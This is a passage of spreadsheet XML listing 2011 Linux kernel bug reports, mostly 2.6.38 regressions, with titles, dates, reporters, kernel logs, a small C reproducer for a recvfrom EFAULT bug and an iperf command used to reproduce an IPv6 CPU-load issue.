    <t>Brightness levels too low on Dell Inspiron 13" Intel HD 4 Series</t>
  </si>
  <si>
    <t>2.6.38-rc6</t>
  </si>
  <si>
    <t>2011-02-24 10:24 UTC</t>
  </si>
  <si>
    <t>Niklas Schnelle</t>
  </si>
  <si>
    <t>2011-03-27 19:59 UTC</t>
  </si>
  <si>
    <t>My Brightness levels when running 2.6.38-rc6 are much to low, I can change them with the fn keys and /sys/devices/virtual/backlight/acpi_video0 but even the highest setting 15 is far to low and barely readable indoors. I've been running 2.6.37.1 where it works this is the first rc I tested. My video adapter is reported by lspci as 00:02.0 VGA compatible controller: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 07) (prog-if 00 [VGA controller]) Subsystem: Dell Device 0418 Flags: bus master, fast devsel, latency 0, IRQ 46 Memory at f0000000 (64-bit, non-prefetchable) [size=4M] Memory at d0000000 (64-bit, prefetchable) [size=256M] I/O ports at 1800 [size=8] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [90] MSI: Enable+ Count=1/1 Maskable- 64bit- Capabilities: [d0] Power Management version 3 Kernel driver in use: i915 Kernel modules: i915 00:02.1 Display controller: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 07) Subsystem: Dell Device 0418 Flags: bus master, fast devsel, latency 0 Memory at f0400000 (64-bit, non-prefetchable) [size=1M] Capabilities: [d0] Power Management version 3</t>
  </si>
  <si>
    <t>System suspend failed after 1-2 successful resumes</t>
  </si>
  <si>
    <t>2011-02-25 22:24 UTC</t>
  </si>
  <si>
    <t>Alex Terekhov</t>
  </si>
  <si>
    <t>2011-05-30 07:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 49122 [details] Syslog After starting my system going to suspend, then resume the system. After that while trying to suspend my system again I get some warnings from libata and that's all. Feb 26 00:10:06 immortal kernel: ------------[ cut here ]------------ Feb 26 00:10:06 immortal kernel: WARNING: at drivers/ata/libata-eh.c:3976 ata_scsi_error+0x14f/0x57d [libata]() Feb 26 00:10:06 immortal kernel: Hardware name: VPCY11M1R Feb 26 00:10:06 immortal kernel: Modules linked in: i915 drm_kms_helper drm i2c_algo_bit loop sha256_generic aes_i586 aes_generic cbc dm_crypt dm_mod arc4 ecb ath9k joydev snd_hda_codec_realtek mac80211 ath9k_common snd_hda_intel snd_hda_codec snd_hwdep snd_pcm ath9k_hw ath snd_seq uvcvideo snd_timer sony_laptop i2c_i801 cfg80211 snd_seq_device videodev psmouse battery snd ac rfkill evdev power_supply soundcore i2c_core snd_page_alloc video button processor ext3 jbd mbcache sd_mod uhci_hcd ahci libahci libata sdhci_pci sdhci scsi_mod ehci_hcd usbcore atl1c thermal mmc_core thermal_sys nls_base [last unloaded: scsi_wait_scan] Feb 26 00:10:06 immortal kernel: Pid: 184, comm: scsi_eh_0 Not tainted 2.6.38-rc6 #15 Feb 26 00:10:06 immortal kernel: Call Trace: Feb 26 00:10:06 immortal kernel: [&lt;c10304a8&gt;] ? warn_slowpath_common+0x6a/0x7b Feb 26 00:10:06 immortal kernel: [&lt;f88f1875&gt;] ? ata_scsi_error+0x14f/0x57d [libata] Feb 26 00:10:06 immortal kernel: [&lt;c10304c6&gt;] ? warn_slowpath_null+0xd/0x10 Feb 26 00:10:06 immortal kernel: [&lt;f88f1875&gt;] ? ata_scsi_error+0x14f/0x57d [libata] Feb 26 00:10:06 immortal kernel: [&lt;f88395f2&gt;] ? scsi_error_handler+0xaa/0x36f [scsi_mod] Feb 26 00:10:06 immortal kernel: [&lt;c10266c9&gt;] ? complete+0x28/0x36 Feb 26 00:10:06 immortal kernel: [&lt;f8839548&gt;] ? scsi_error_handler+0x0/0x36f [scsi_mod] Feb 26 00:10:06 immortal kernel: [&lt;c1042c61&gt;] ? kthread+0x63/0x68 Feb 26 00:10:06 immortal kernel: [&lt;c1042bfe&gt;] ? kthread+0x0/0x68 Feb 26 00:10:06 immortal kernel: [&lt;c100933e&gt;] ? kernel_thread_helper+0x6/0x10 Feb 26 00:10:06 immortal kernel: ---[ end trace 19a7d3ffb6ba8aa9 ]---</t>
  </si>
  <si>
    <t>[BISECTED]PS2-Keyboard and Mouse (i8042) is not working at Pegasos II PPC computers</t>
  </si>
  <si>
    <t>2011-02-27 11:32 UTC</t>
  </si>
  <si>
    <t>Johannes Geiss</t>
  </si>
  <si>
    <t>2013-11-18 10:57 UTC</t>
  </si>
  <si>
    <t>The module i8042 fails on Pegasos II (http://en.wikipedia.org/wiki/Pegasos): request_irq(I8042_AUX_IRQ, i8042_aux_test_irq, IRQF_SHARED, "i8042", i8042_platform_device) fails. Same with keyboard. It doesn't matter whether to compile i8042 into kernel or as loadable module.</t>
  </si>
  <si>
    <t>r8169: 60 seconds delay when resuming from suspend</t>
  </si>
  <si>
    <t>2011-02-27 16:52 UTC</t>
  </si>
  <si>
    <t>Guillaume Ayoub</t>
  </si>
  <si>
    <t>2011-03-27 19:52 UTC</t>
  </si>
  <si>
    <t>As explained in f1e02ed109df5f99abf942b8ccc99960cb09dd38, a 60 seconds delay happens when resuming from suspend, freezing the system. After this delay, everything is OK. 2 workarounds: - Install the realtek firmware, or - Unload the r8169 module before suspending. This delay was not happening with 2.6.37 (the firmware was included in the kernel). For the record, the firmware was removed from the kernel in bca03d5f32c8ee9b5cfa1d32640a63fded6cb3c0. I'm ready to debug or test patches if needed.</t>
  </si>
  <si>
    <t>BUG in xs_tcp_setup_socket</t>
  </si>
  <si>
    <t>2011-03-01 20:34 UTC</t>
  </si>
  <si>
    <t>2011-03-30 20:37 UTC</t>
  </si>
  <si>
    <t>30222 30232 30252 30272 30292</t>
  </si>
  <si>
    <t>[Previously posted at http://article.gmane.org/gmane.linux.nfs/38949 including a patch] BUG: unable to handle kernel NULL pointer dereference at 0000000000000020 IP: [&lt;ffffffffa05b5e08&gt;] xs_tcp_setup_socket+0x348/0x4a0 [sunrpc] PGD 0 Oops: 0000 [#1] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:1c.0/0000:02:00.0/0000:03:00.0/irq CPU 0 Modules linked in: netconsole configfs nfs lockd fscache nfs_acl auth_rpcgss ip6table_filter ip6_tables ebtable_nat ebtables ipt_MASQUERADE iptable_nat nf_nat bridge stp llc autofs4 sunrpc be2iscsi iscsi_boot_sysfs bnx2i cnic uio cxgb3i libcxgbi cxgb3 ib_iser rdma_cm ib_cm iw_cm ib_sa ib_mad ib_core ib_addr ipv6 iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi ext2 dm_mirror dm_region_hash dm_log dm_mod vhost_net macvtap macvlan tun kvm_intel kvm uinput bnx2 sg dcdbas serio_raw pcspkr iTCO_wdt iTCO_vendor_support i5k_amb i5000_edac edac_core ioatdma dca sfc mtd mdio shpchp ext3 jbd mbcache sr_mod cdrom sd_mod crc_t10dif pata_acpi ata_generic ata_piix mptsas mptscsih mptbase scsi_transport_sas radeon ttm drm_kms_helper drm hwmon i2c_algo_bit i2c_core [last unloaded: speedstep_lib] Pid: 10, comm: kworker/0:1 Not tainted 2.6.38-rc5 #3 Dell Inc. PowerEdge 2950/0CX396 RIP: 0010:[&lt;ffffffffa05b5e08&gt;] [&lt;ffffffffa05b5e08&gt;] xs_tcp_setup_socket+0x348/0x4a0 [sunrpc] RSP: 0018:ffff880126c11da0 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff8801220ee000 RCX: 0000000100016909 RDX: 000000000000001e RSI: ffff880123065a80 RDI: 0000000000000000 RBP: ffff880126c11df0 R08: f018000000000000 R09: febef9edc98abe03 R10: 0000000000000480 R11: 0000000000000000 R12: ffff8801220ee680 R13: ffffe8ffffc0dd00 R14: 0000000000000000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff8800cf800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000000020 CR3: 000000012191f000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process kworker/0:1 (pid: 10, threadinfo ffff880126c10000, task ffff880126c0f560) Stack: 0000000000014e80 ffff880126c0f560 ffff880126c0faf0 00000000c17d7567 ffff880126c0faf8 ffff8801273cbc40 ffff8800cf811040 ffffe8ffffc0dd00 ffffffffa05b5ac0 0000000000000000 ffff880126c11e50 ffffffff8107b884 Call Trace: [&lt;ffffffffa05b5ac0&gt;] ? xs_tcp_setup_socket+0x0/0x4a0 [sunrpc] [&lt;ffffffff8107b884&gt;] process_one_work+0x124/0x430 [&lt;ffffffff8107e1d1&gt;] worker_thread+0x181/0x3c0 [&lt;ffffffff8107e050&gt;] ? worker_thread+0x0/0x3c0 [&lt;ffffffff810828c6&gt;] kthread+0x96/0xa0 [&lt;ffffffff8100cdc4&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff81082830&gt;] ? kthread+0x0/0xa0 [&lt;ffffffff8100cdc0&gt;] ? kernel_thread_helper+0x0/0x10 Code: 0f 1f 00 0f 84 3a ff ff ff e9 4b fe ff ff 0f 1f 44 00 00 41 83 fd 91 0f 85 3c fe ff ff 66 0f 1f 44 00 00 e9 1b ff ff ff 0f 1f 00 &lt;4d&gt; 8b 6e 20 4d 8d bd 68 01 00 00 4c 89 ff e8 45 99 f0 e0 49 8b RIP [&lt;ffffffffa05b5e08&gt;] xs_tcp_setup_socket+0x348/0x4a0 [sunrpc] RSP &lt;ffff880126c11da0&gt; CR2: 0000000000000020 ---[ end trace 6efc43bb9b1264f8 ]--- The code dump alone is pretty useless as the IP is at the start of a block, but having disassembled the entire sunrpc module it appears that it corresponds to: static int xs_tcp_finish_connecting(struct rpc_xprt *xprt, struct socket *sock) { struct sock_xprt *transport = container_of(xprt, struct sock_xprt, xprt); if (!transport-&gt;inet) { struct sock *sk = sock-&gt;sk; /* &lt;-- this line */ write_lock_bh(&amp;sk-&gt;sk_callback_lock); I think the bug is that xs_create_sock() returns 0 if xs_bind() fails. This bug appears to have been introduced in 2.6.37 by: commit b65c0310611af73569f94c526a1e2323d99b380a Author: Pavel Emelyanov &lt;xemul@parallels.com&gt; Date: Mon Oct 4 16:53:46 2010 +0400 sunrpc: Factor out udp sockets creation commit 22f793268de3b4dff8abfcd873ba7afc1f34224f Author: Pavel Emelyanov &lt;xemul@parallels.com&gt; Date: Mon Oct 4 16:54:26 2010 +0400 sunrpc: Factor out v4 sockets creation commit 22d44a7d8a03456aa6d0a047c051aa28728e6ecd Author: Pavel Emelyanov &lt;xemul@parallels.com&gt; Date: Mon Oct 4 16:54:55 2010 +0400 sunrpc: Factor out v6 sockets creation</t>
  </si>
  <si>
    <t>System call recvfrom() returns "EFAULT" when the receive buffer end at 0x7fffffffefff</t>
  </si>
  <si>
    <t>2011-03-02 00:29 UTC</t>
  </si>
  <si>
    <t>2012-05-12 15:02 UTC</t>
  </si>
  <si>
    <t>The following program maps page 0x7fffffffe000 then use recv (translated into recvfrom in glibc) to receive 4096 bytes. according to strace's result, recvfrom returns -EFAULT. If change 0x7fffffffe000 to 0x7fffffffd000, recvfrom returns successfully. My kernel version is 2.6.36-gentoo-r5. #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;memory.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/socket.h&gt; #include &lt;assert.h&gt; #define PAGE_SIZE (4096) #define LAST_PAGE ((void*)(0x7fffffffe000)) int main() { void * ptr = mmap(LAST_PAGE, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); assert(ptr == LAST_PAGE); memset(ptr, '\0', PAGE_SIZE); void * data = malloc(PAGE_SIZE); assert(data != NULL); memset(data, '1', PAGE_SIZE); int fds[2]; int err = socketpair(AF_LOCAL, SOCK_STREAM, 0, fds); assert(err == 0); err = send(fds[0], data, PAGE_SIZE, 0); assert(err == PAGE_SIZE); err = recv(fds[1], ptr, PAGE_SIZE, MSG_WAITALL); perror("recv returns"); return 0; } // vim:ts=4:sw=4 Reproducible: Always Steps to Reproduce: 1. compile the program; 2. run the generated executable; Actual Results: recv returns: Bad address Expected Results: recv returns: Success</t>
  </si>
  <si>
    <t>rmdir on cgroup can cause hang tasks</t>
  </si>
  <si>
    <t>2011-03-04 04:27 UTC</t>
  </si>
  <si>
    <t>Daniel Poelzleithner</t>
  </si>
  <si>
    <t>I just got following hang when removing an empty cgroup. I had still a shell in the cgroup that got emptied and removed. The shell as well as the release_agent and the program managing the cgroup hangs. The directory structure looks like: /sys/fs/cgroup/memory/usr_1000/psn_3234 ls on /sys/fs/cgroup/memory but ls on /sys/fs/cgroup/memory/usr_1000 hangs. [ 5065.280666] SysRq : Changing Loglevel [ 5065.282574] Loglevel set to 5 [ 5066.139879] SysRq : Show Blocked State [ 5066.141848] task PC stack pid father [ 5066.141925] zsh D ffff880071520398 0 8719 3589 0x00000084 [ 5066.141937] ffff880002059bd8 0000000000000086 ffff880002059bb8 ffffffff00000000 [ 5066.143971] 00000000000139c0 ffff880071520000 ffff880071520398 ffff880002059fd8 [ 5066.146049] ffff8800715203a0 00000000000139c0 ffff880002058010 00000000000139c0 [ 5066.148183] Call Trace: [ 5066.149853] [&lt;ffffffff8158ec97&gt;] __mutex_lock_slowpath+0xf7/0x180 [ 5066.149853] [&lt;ffffffff812d74a6&gt;] ? vsnprintf+0x416/0x5a0 [ 5066.149853] [&lt;ffffffff8158eb7b&gt;] mutex_lock+0x2b/0x50 [ 5066.149853] [&lt;ffffffff81168252&gt;] do_lookup+0x102/0x180 [ 5066.149853] [&lt;ffffffff81168dfd&gt;] link_path_walk+0x4dd/0x9e0 [ 5066.149853] [&lt;ffffffff81169417&gt;] path_walk+0x67/0xe0 [ 5066.149853] [&lt;ffffffff811695eb&gt;] do_path_lookup+0x5b/0xa0 [ 5066.149853] [&lt;ffffffff8116a2f7&gt;] user_path_at+0x57/0xa0 [ 5066.149853] [&lt;ffffffff815940e0&gt;] ? do_page_fault+0x1f0/0x4f0 [ 5066.149853] [&lt;ffffffff81075e6c&gt;] ? kill_pid_info+0x2c/0x60 [ 5066.149853] [&lt;ffffffff811604fc&gt;] vfs_fstatat+0x3c/0x80 [ 5066.149853] [&lt;ffffffff8116061b&gt;] vfs_stat+0x1b/0x20 [ 5066.149853] [&lt;ffffffff81160644&gt;] sys_newstat+0x24/0x50 [ 5066.149853] [&lt;ffffffff810bf6ff&gt;] ? audit_syscall_entry+0x1df/0x280 [ 5066.149853] [&lt;ffffffff8100c042&gt;] system_call_fastpath+0x16/0x1b [ 5066.149853] ulatencyd D ffff88007a0bc7d8 0 9004 4809 0x00000084 [ 5066.149853] ffff880070b55cd8 0000000000000082 0000000000000082 ffff88002c9d16c0 [ 5066.149853] 00000000000139c0 ffff88007a0bc440 ffff88007a0bc7d8 ffff880070b55fd8 [ 5066.149853] ffff88007a0bc7e0 00000000000139c0 ffff880070b54010 00000000000139c0 [ 5066.149853] Call Trace: [ 5066.149853] [&lt;ffffffff8158ec97&gt;] __mutex_lock_slowpath+0xf7/0x180 [ 5066.149853] [&lt;ffffffff81166124&gt;] ? exec_permission+0x44/0x90 [ 5066.149853] [&lt;ffffffff8158eb7b&gt;] mutex_lock+0x2b/0x50 [ 5066.149853] [&lt;ffffffff81168418&gt;] do_last+0x148/0x650 [ 5066.149853] [&lt;ffffffff8116a6d5&gt;] do_filp_open+0x205/0x5f0 [ 5066.149853] [&lt;ffffffff81167281&gt;] ? path_put+0x31/0x40 [ 5066.149853] [&lt;ffffffff8117593a&gt;] ? alloc_fd+0x10a/0x150 [ 5066.149853] [&lt;ffffffff81159bb9&gt;] do_sys_open+0x69/0x110 [ 5066.149853] [&lt;ffffffff81159ca0&gt;] sys_open+0x20/0x30 [ 5066.149853] [&lt;ffffffff8100c042&gt;] system_call_fastpath+0x16/0x1b [ 5066.149853] lua D ffff88002c91b118 0 9487 1 0x00000080 [ 5066.149853] ffff880078f6db08 0000000000000086 ffff88002c91b118 ffff880000000000 [ 5066.149853] 00000000000139c0 ffff88002c91ad80 ffff88002c91b118 ffff880078f6dfd8 [ 5066.149853] ffff88002c91b120 00000000000139c0 ffff880078f6c010 00000000000139c0 [ 5066.149853] Call Trace: [ 5066.149853] [&lt;ffffffff8158e4d5&gt;] schedule_timeout+0x215/0x2f0 [ 5066.149853] [&lt;ffffffff8104e4fd&gt;] ? task_rq_lock+0x5d/0xa0 [ 5066.149853] [&lt;ffffffff81059c93&gt;] ? try_to_wake_up+0xc3/0x410 [ 5066.149853] [&lt;ffffffff8158e0cb&gt;] wait_for_common+0xdb/0x180 [ 5066.149853] [&lt;ffffffff81059fe0&gt;] ? default_wake_function+0x0/0x20 [ 5066.244366] [&lt;ffffffff8158e24d&gt;] wait_for_completion+0x1d/0x20 [ 5066.244366] [&lt;ffffffff810d44f5&gt;] synchronize_sched+0x55/0x60 [ 5066.244366] [&lt;ffffffff81080b00&gt;] ? wakeme_after_rcu+0x0/0x20 [ 5066.244366] [&lt;ffffffff811526a3&gt;] mem_cgroup_start_move+0x93/0xa0 [ 5066.244366] [&lt;ffffffff8115739b&gt;] mem_cgroup_force_empty+0xdb/0x640 [ 5066.244366] [&lt;ffffffff81157914&gt;] mem_cgroup_pre_destroy+0x14/0x20 [ 5066.244366] [&lt;ffffffff810ae681&gt;] cgroup_rmdir+0xc1/0x560 [ 5066.244366] [&lt;ffffffff81083d70&gt;] ? autoremove_wake_function+0x0/0x40 [ 5066.244366] [&lt;ffffffff81167cc4&gt;] vfs_rmdir+0xb4/0x110 [ 5066.244366] [&lt;ffffffff81169d13&gt;] do_rmdir+0x133/0x140 [ 5066.244366] [&lt;ffffffff810d3c85&gt;] ? call_rcu_sched+0x15/0x20 [ 5066.244366] [&lt;ffffffff810bf6ff&gt;] ? audit_syscall_entry+0x1df/0x280 [ 5066.244366] [&lt;ffffffff81169d76&gt;] sys_rmdir+0x16/0x20 [ 5066.244366] [&lt;ffffffff8100c042&gt;] system_call_fastpath+0x16/0x1b</t>
  </si>
  <si>
    <t>High cpu usage when someone sends many ipv6 udp packages</t>
  </si>
  <si>
    <t>2011-03-05 01:10 UTC</t>
  </si>
  <si>
    <t>Hi, while testing ipv6 performance on my local network I found the following problem. When sending lots of UDP packages over ipv6 to a machine running kernel 2.6.38-rc3 or later that machines become heavily loaded and X may stop responding for long periods of time for example, sound skips etc. A ksoftirqd and kworker thread each run 100% on my machine. I'm using this command to trigger this: iperf -c fe80::21f:d0ff:fe54:1ad4%eth0 -b 1000M -u -V You _don't_ have to setup an iperf server on the reciever. I have a gigabit network with a WNDR3700 with the new V1.0.7.98 firmware that's "IPv6 ready". I've used the kernels from http://kernel.ubuntu.com/~kernel-ppa/mainline/ to narrow down that this happens with 2.6.38-rc3 and later but not with 2.6.38-rc2 and earlier like 2.6.37 and 2.6.35. The following ipv6 related changes were introduced between -rc2 and -rc3 that I can see. The "Revert 'administrative down' address handling changes." looked big... ipv6: Always clone offlink routes. ipv6: Revert 'administrative down' address handling changes.</t>
  </si>
  <si>
    <t>2.6.38-post-rc7 with radeon kms: reproducably locks up hard when using desktop cube of kwin</t>
  </si>
  <si>
    <t>2.6.38-rc7-g212e349</t>
  </si>
  <si>
    <t>2011-03-05 14:20 UTC</t>
  </si>
  <si>
    <t>2011-03-27 19:46 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] 2.6.38-post-rc7 with radeon kms: reproducably locks up hard when using desktop cube of kwin Submitter : Martin Steigerwald &lt;Martin@lichtvoll.de&gt; Date : 2011-03-05 15:10:24 Message-ID : 201103051510.35057.Martin@lichtvoll.de References : http://marc.info/?l=linux-kernel&amp;m=129933425306804&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ACPI Exception: AE_NOT_FOUND, Could not execute arguments for [RAMW] (Region) (20110112/nsinit-349)</t>
  </si>
  <si>
    <t>2.6.38-rc7</t>
  </si>
  <si>
    <t>2011-03-07 11:26 UTC</t>
  </si>
  <si>
    <t>2012-02-02 03:12 UTC</t>
  </si>
  <si>
    <t>Created attachment 50232 [details] dmesg Per http://linux.derkeiler.com/Mailing-Lists/Kernel/2007-04/msg07673.html I'm filing a bug report. My dmesg contains some ACPI related errors: ACPI: EC: Look up EC in DSDT ACPI: Executed 1 blocks of module-level executable AML code ACPI Error: [RAMB] Namespace lookup failure, AE_NOT_FOUND (20110112/psargs-359) ACPI Exception: AE_NOT_FOUND, Could not execute arguments for [RAMW] (Region) (20110112/nsinit-349) ACPI: SSDT cf5d8c18 0038C (v01 AMI IST 00000001 MSFT 03000001) ACPI: Dynamic OEM Table Load: ACPI: SSDT (null) 0038C (v01 AMI IST 00000001 MSFT 03000001) ACPI: SSDT cf5d9e18 00084 (v01 AMI CST 00000001 MSFT 03000001) ACPI: Dynamic OEM Table Load: ACPI: SSDT (null) 00084 (v01 AMI CST 00000001 MSFT 03000001) ACPI: Interpreter enabled ACPI: (supports S0 S1 S3 S5) ACPI: Using IOAPIC for interrupt routing</t>
  </si>
  <si>
    <t>NFS sillyrenamed files are not being deleted after close</t>
  </si>
  <si>
    <t>2011-03-08 13:21 UTC</t>
  </si>
  <si>
    <t>2011-03-16 21:47 UTC</t>
  </si>
  <si>
    <t>I'm opening this bug to ensure that 2.6.38 doesn't ship with sillyrenames still broken. If someone has already done so, please feel free to close this one as a duplicate. This is a regression introduced by patch 949854d0. Trond has a proposed patch to fix it here, but there are other possible approaches: http://git.linux-nfs.org/?p=trondmy/nfs-2.6.git;a=commit;h=674d01f97d0094e8c383f7dbdf0782a304f6348b</t>
  </si>
  <si>
    <t>Radeon S-Video Out has become black and white. Works fine in 2.6.37</t>
  </si>
  <si>
    <t>2011-03-09 18:28 UTC</t>
  </si>
  <si>
    <t>Arbit Rabbit</t>
  </si>
  <si>
    <t>2011-03-27 20:04 UTC</t>
  </si>
  <si>
    <t>The S-Video out of Radeon driver has become black and white in kernel 2.6.38.The regression happened around 2.6.37.2 as the driver worked fine in 2.6.37. I have a Radeon HD4850 card. Here is the difference in the dmesg output from the two kernels. I can hardly notice any difference, other than timestamps. In kernel 2.6.38, initialization happens very quickly - maybe a timing issue? Other than the kernels, everything else is same. 2.6.38-6-generic [ 9.422549] [drm] Initialized drm 1.1.0 20060810 [ 10.094022] [drm] radeon defaulting to kernel modesetting. [ 10.094024] [drm] radeon kernel modesetting enabled. [ 10.094105] fb: conflicting fb hw usage radeondrmfb vs VESA VGA - removing generic driver [ 10.095453] [drm] initializing kernel modesetting (RV770 0x1002:0x9442). [ 10.095475] [drm] register mmio base: 0xFDFE0000 [ 10.095476] [drm] register mmio size: 65536 [ 10.097903] [drm] Detected VRAM RAM=512M, BAR=256M [ 10.097906] [drm] RAM width 256bits DDR [ 10.098018] [drm] radeon: 512M of VRAM memory ready [ 10.098020] [drm] radeon: 512M of GTT memory ready. [ 10.098033] [drm] Supports vblank timestamp caching Rev 1 (10.10.2010). [ 10.098034] [drm] Driver supports precise vblank timestamp query. [ 10.098097] [drm] radeon: irq initialized. [ 10.098099] [drm] GART: num cpu pages 131072, num gpu pages 131072 [ 10.098748] [drm] Loading RV770 Microcode [ 11.480076] [drm] ring test succeeded in 1 usecs [ 11.480146] [drm] radeon: ib pool ready. [ 11.480196] [drm] ib test succeeded in 0 usecs [ 11.480198] [drm] Enabling audio support [ 11.480389] [drm] Radeon Display Connectors [ 11.480390] [drm] Connector 0: [ 11.480391] [drm] DVI-I [ 11.480392] [drm] HPD1 [ 11.480394] [drm] DDC: 0x7e60 0x7e60 0x7e64 0x7e64 0x7e68 0x7e68 0x7e6c 0x7e6c [ 11.480395] [drm] Encoders: [ 11.480396] [drm] DFP1: INTERNAL_UNIPHY [ 11.480397] [drm] CRT2: INTERNAL_KLDSCP_DAC2 [ 11.480398] [drm] Connector 1: [ 11.480399] [drm] DIN [ 11.480400] [drm] Encoders: [ 11.480400] [drm] TV1: INTERNAL_KLDSCP_DAC2 [ 11.480401] [drm] Connector 2: [ 11.480402] [drm] DVI-I [ 11.480403] [drm] HPD2 [ 11.480404] [drm] DDC: 0x7e20 0x7e20 0x7e24 0x7e24 0x7e28 0x7e28 0x7e2c 0x7e2c [ 11.480405] [drm] Encoders: [ 11.480406] [drm] CRT1: INTERNAL_KLDSCP_DAC1 [ 11.480407] [drm] DFP2: INTERNAL_KLDSCP_LVTMA [ 11.536188] [drm] Internal thermal controller with fan control [ 11.536219] [drm] radeon: power management initialized [ 11.638668] [drm] fb mappable at 0xD0142000 [ 11.638669] [drm] vram apper at 0xD0000000 [ 11.638670] [drm] size 8294400 [ 11.638671] [drm] fb depth is 24 [ 11.638672] [drm] pitch is 7680 [ 11.638789] fb0: radeondrmfb frame buffer device [ 11.638790] drm: registered panic notifier [ 11.638794] [drm] Initialized radeon 2.8.0 20080528 for 0000:01:00.0 on minor 0 [ 22.170538] [drm:drm_mode_getfb] *ERROR* invalid framebuffer id 2.6.37-020637-generic [ 15.278388] [drm] Initialized drm 1.1.0 20060810 [ 15.654177] [drm] radeon defaulting to kernel modesetting. [ 15.654178] [drm] radeon kernel modesetting enabled. [ 15.654692] fb: conflicting fb hw usage radeondrmfb vs VESA VGA - removing generic driver [ 15.656087] [drm] initializing kernel modesetting (RV770 0x1002:0x9442). [ 15.660089] [drm] register mmio base: 0xFDFE0000 [ 15.660090] [drm] register mmio size: 65536 [ 15.662457] [drm] Detected VRAM RAM=512M, BAR=256M [ 15.662460] [drm] RAM width 256bits DDR [ 15.670407] [drm] radeon: 512M of VRAM memory ready [ 15.670408] [drm] radeon: 512M of GTT memory ready. [ 15.670477] [drm] radeon: irq initialized. [ 15.670479] [drm] GART: num cpu pages 131072, num gpu pages 131072 [ 15.671039] [drm] Loading RV770 Microcode [ 15.870579] [drm] ring test succeeded in 1 usecs [ 15.870647] [drm] radeon: ib pool ready. [ 15.870699] [drm] ib test succeeded in 0 usecs [ 15.870701] [drm] Enabling audio support [ 15.870886] [drm] Radeon Display Connectors [ 15.870887] [drm] Connector 0: [ 15.870888] [drm] DVI-I [ 15.870889] [drm] HPD1 [ 15.870890] [drm] DDC: 0x7e60 0x7e60 0x7e64 0x7e64 0x7e68 0x7e68 0x7e6c 0x7e6c [ 15.870891] [drm] Encoders: [ 15.870892] [drm] DFP1: INTERNAL_UNIPHY [ 15.870893] [drm] CRT2: INTERNAL_KLDSCP_DAC2 [ 15.870894] [drm] Connector 1: [ 15.870895] [drm] DIN [ 15.870896] [drm] Encoders: [ 15.870897] [drm] TV1: INTERNAL_KLDSCP_DAC2 [ 15.870898] [drm] Connector 2: [ 15.870898] [drm] DVI-I [ 15.870899] [drm] HPD2 [ 15.870901] [drm] DDC: 0x7e20 0x7e20 0x7e24 0x7e24 0x7e28 0x7e28 0x7e2c 0x7e2c [ 15.870902] [drm] Encoders: [ 15.870903] [drm] CRT1: INTERNAL_KLDSCP_DAC1 [ 15.870904] [drm] DFP2: INTERNAL_KLDSCP_LVTMA [ 15.936495] [drm] Internal thermal controller with fan control [ 15.936529] [drm] radeon: power management initialized [ 16.028673] [drm] fb mappable at 0xD0142000 [ 16.028674] [drm] vram apper at 0xD0000000 [ 16.028675] [drm] size 8294400 [ 16.028676] [drm] fb depth is 24 [ 16.028677] [drm] pitch is 7680 [ 16.028790] fb0: radeondrmfb frame buffer device [ 16.028792] drm: registered panic notifier [ 16.028795] [drm] Initialized radeon 2.7.0 20080528 for 0000:01:00.0 on minor 0 [ 20.216393] [drm:drm_mode_getfb] *ERROR* invalid framebuffer id [ 20.981880] Modules linked in: nfs lockd fscache nfs_acl auth_rpcgss sunrpc snd_hda_codec_hdmi tuner_simple tuner_types wm8775 tda9887 tda8290 snd_hda_codec_realtek tuner radeon cx25840 snd_hda_intel ivtv cx2341x snd_hda_codec snd_seq_midi btusb bluetooth v4l2_common snd_rawmidi videodev snd_hwdep snd_seq_midi_event v4l1_compat v4l2_compat_ioctl32 tveeprom snd_pcm snd_seq ttm joydev hid_topseed drm_kms_helper serio_raw drm hid_logitech i2c_piix4 ff_memless lp ppdev parport_pc parport snd_seq_device snd_timer i2c_algo_bit k10temp edac_core edac_mce_amd cdc_acm usblp shpchp snd soundcore snd_page_alloc usbhid hid usb_storage uas firewire_ohci ahci firewire_core crc_itu_t r8169 pata_atiixp libahci</t>
  </si>
  <si>
    <t>acer-wmi: rfkill and bluetooth enabling doesn't work as in 2.6.37</t>
  </si>
  <si>
    <t>2011-03-12 20:15 UTC</t>
  </si>
  <si>
    <t>2011-05-16 17:33 UTC</t>
  </si>
  <si>
    <t>Subject : acer-wmi: rfkill and bluetooth enabling doesn't work as in 2.6.37 Submitter : Oldřich Jedlička &lt;oldium.pro@seznam.cz&gt; Date : 2011-03-10 18:37 Message-ID : 201103101937.01864.oldium.pro@seznam.cz References : http://marc.info/?l=linux-acpi&amp;m=129978235612140&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>acer-wmi does not load automatically with an Acer Aspire 4520</t>
  </si>
  <si>
    <t>2.6.37.3</t>
  </si>
  <si>
    <t>2011-03-14 08:21 UTC</t>
  </si>
  <si>
    <t>2012-05-12 14:56 UTC</t>
  </si>
  <si>
    <t>drivers_platform@kernel-bugs.osdl.org</t>
  </si>
  <si>
